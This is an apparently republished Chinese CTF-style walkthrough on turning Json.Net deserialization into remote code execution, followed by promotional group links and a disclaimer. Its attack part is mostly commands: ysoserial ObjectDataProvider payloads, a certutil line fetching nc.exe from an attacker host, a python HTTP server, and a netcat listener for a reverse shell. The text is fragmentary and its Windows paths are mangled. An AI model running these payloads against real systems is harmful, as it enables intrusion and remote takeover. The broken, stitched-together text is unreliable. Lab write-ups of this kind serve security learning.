介绍
echo "base64encodedtext" | base64-d | jq
echo '{"Id":1,"UserName":"s12","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}' | base64 -w 0
无法反序列化 Json.Net 对象”。我不需要更多……足够了这些。。
制作恶意代码
要执行此步骤,我们将需要一台 Windows 机器,并且只能访问互联网。一旦我们有了 Windows 机器,我们就从这个存储库下载 Releases zip文件:提取所有 zip 文件后,您可以看到一个名为 Releases 的文件夹,单击内部并查看是否有一个名为 ysoserial.exe 的 exe,如果它在这里,则一切正常。打开CMD -> 使用cd命令进入ysoserial.exe文件夹-> 执行exe查看帮助菜单
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping IP_KALI"
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping IP" -o base64
Kali:
python3 -m http.server 80ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil.exe -f -urlcache -split http://IP_KALI/nc.exe C:Windows
SysWOW64TasksMicrosoftWindowsPLASystem nc .exe " -o base64
Kali:
rlwrap nc -lvnp 1212
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil.exe -f -urlcache -split http://10.10.14.12/nc.exe C:WindowsSysWOW64TasksMicrosoftWindowsPLASystem nc.exe" -o base64
结论
QQ学习群
微信群
想成为Kevin Mitnick一样的
黑客教父?不存在的
想成为渗透之神?醒醒吧
看了无数入门视频,依然搞不到Shell
不妨看看《安全帮Live》
原文始发于微信公众号(安全帮Live):实战 | JSON反序列化到RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论